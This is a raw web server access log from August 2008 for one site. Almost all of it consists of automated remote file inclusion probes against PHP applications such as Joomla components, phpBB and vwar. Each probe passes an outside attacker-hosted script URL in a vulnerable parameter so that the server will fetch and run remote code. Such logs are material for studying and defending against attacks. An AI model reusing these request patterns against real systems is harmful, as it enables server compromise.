69.42.218.66 - - [10/Aug/2008:12:38:52 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 200 3694 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:38:53 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:38:53 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:38:55 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:38:59 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:00 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:00 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:01 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:05 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:10 -0700] "GET /logs/access.log//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:12:39:10 -0700] "GET /logs/access.log//errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:12:39:11 -0700] "GET //errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:11 -0700] "GET //index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:39:12 -0700] "GET /logs//index.php?name=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:39:39 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:40:33 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:40:33 -0700] "GET /logs/access_080313.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:40:34 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:40:37 -0700] "GET /logs/access_080321.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:40:40 -0700] "GET //index.php?name=http://seandempsey.com/temp/fastidio.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:40:42 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:41:30 -0700] "GET /logs/access_071226.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://vncx.t35.com/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
221.144.12.141 - - [10/Aug/2008:12:41:48 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
221.144.12.141 - - [10/Aug/2008:12:41:48 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:17 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:17 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:18 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:42:23 -0700] "GET /logs//errors.php?error=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:12:42:24 -0700] "GET //errors.php?error=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.180.241.37 - - [10/Aug/2008:12:42:36 -0700] "GET /logs/access_080118.log/index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:12:42:38 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.180.241.37 - - [10/Aug/2008:12:42:38 -0700] "GET /index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 200 18371 "-" "libwww-perl/5.810" "www.dmulk.com"
216.180.241.37 - - [10/Aug/2008:12:42:39 -0700] "GET /logs/index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:47 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:47 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:42:47 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.211.28 - - [10/Aug/2008:12:42:56 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.28 - - [10/Aug/2008:12:42:57 -0700] "GET /bikes/dteel/15JAN08/?D=A HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:12:43:47 -0700] "GET /logs/access_080126.log//components/com_forum/download.php?phpbb_root_path=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:12:43:48 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:12:43:48 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:43:54 -0700] "GET /scanhttp://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:43:54 -0700] "GET /logs/access_080218.log/scanhttp://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:43:56 -0700] "GET /logs/scanhttp://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:12:44:01 -0700] "GET /logs/access_080127.log/scanhttp://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:44:12 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:44:13 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:44:13 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [10/Aug/2008:12:44:16 -0700] "GET /logs/access_080118.log/index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [10/Aug/2008:12:44:20 -0700] "GET /index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 200 18371 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.64 - - [10/Aug/2008:12:44:21 -0700] "GET /logs/index.php?url=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.206.238.35 - - [10/Aug/2008:12:44:22 -0700] "GET /logs/access_080117.log//components/com_forum/download.php?phpbb_root_path=http://memek.net63.net/dosa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:45:11 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.211.27 - - [10/Aug/2008:12:45:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.27 - - [10/Aug/2008:12:45:28 -0700] "GET /megumi/?N=A HTTP/1.1" 200 1079 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:45:34 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.17.103.109 - - [10/Aug/2008:12:46:06 -0700] "GET //Pagina.php?pg=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [10/Aug/2008:12:46:06 -0700] "GET /logs//Pagina.php?pg=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [10/Aug/2008:12:46:06 -0700] "GET /logs/access.log//Pagina.php?pg=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.103.109 - - [10/Aug/2008:12:46:06 -0700] "GET /logs/access_071228.log//Pagina.php?pg=http://www.kainotesglobal.com/ecommerce/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.31 - - [10/Aug/2008:12:46:55 -0700] "GET /?S=A&show=gallery&pageid=17&nggpage=2 HTTP/1.1" 200 54436 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:20 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:20 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:20 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:23 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:24 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:47:24 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:48:05 -0700] "GET /logs/access_080226.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:48:17 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.251.137.2 - - [10/Aug/2008:12:48:20 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.251.137.2 - - [10/Aug/2008:12:48:20 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:48:22 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:12:49:04 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bfdg.net/go/router/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:12:49:05 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bfdg.net/go/router/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:12:49:05 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bfdg.net/go/router/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:49:17 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:49:18 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.255.110.5 - - [10/Aug/2008:12:49:23 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://bfdg.net/go/router/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:50:04 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:50:05 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:50:08 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:50:08 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.88.216.101 - - [10/Aug/2008:12:50:20 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
198.88.216.101 - - [10/Aug/2008:12:50:20 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:50:36 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:12:50:36 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:12:51:12 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:12:51:13 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:12:51:14 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:12:51:14 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:12:51:21 -0700] "GET /logs/access_080313.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:52:32 -0700] "GET /logs/port.php?content=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:52:33 -0700] "GET /port.php?content=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:12:52:45 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:12:52:45 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:12:52:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:12:52:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:12:52:52 -0700] "GET /logs/access_080211.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.thegoodfoot.com/logs/dorid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:12:52:57 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.thegoodfoot.com/logs/dorid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.55.211.27 - - [10/Aug/2008:12:53:04 -0700] "GET /bikes/cb750K6/?D=D HTTP/1.1" 200 1626 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:53:04 -0700] "GET /logs/access_080116.log//protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:53:10 -0700] "GET //protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:53:15 -0700] "GET /logs//protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:53:16 -0700] "GET ///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:53:16 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:53:16 -0700] "GET /logs///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:53:40 -0700] "GET /logs/access_080306.log///vwar/backup/errors.php?error=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:12:53:41 -0700] "GET /?sourcedir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 200 18411 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:03 -0700] "GET /logs/access_080116.log//protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:03 -0700] "GET //protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:03 -0700] "GET /logs//protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:13 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:26 -0700] "GET /logs/access_080214.log//index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:26 -0700] "GET //index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:26 -0700] "GET /logs//index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:28 -0700] "GET /logs/access_080311.log//index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:54:29 -0700] "GET /logs/access_080131.log/index2.php?sekce=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:54:29 -0700] "GET /index2.php?sekce=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:54:44 -0700] "GET /logs/access_080226.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:54:44 -0700] "GET //components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:48 -0700] "GET /logs/access_080214.log//index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:54:52 -0700] "GET /logs/access_080226.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:54:52 -0700] "GET //components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
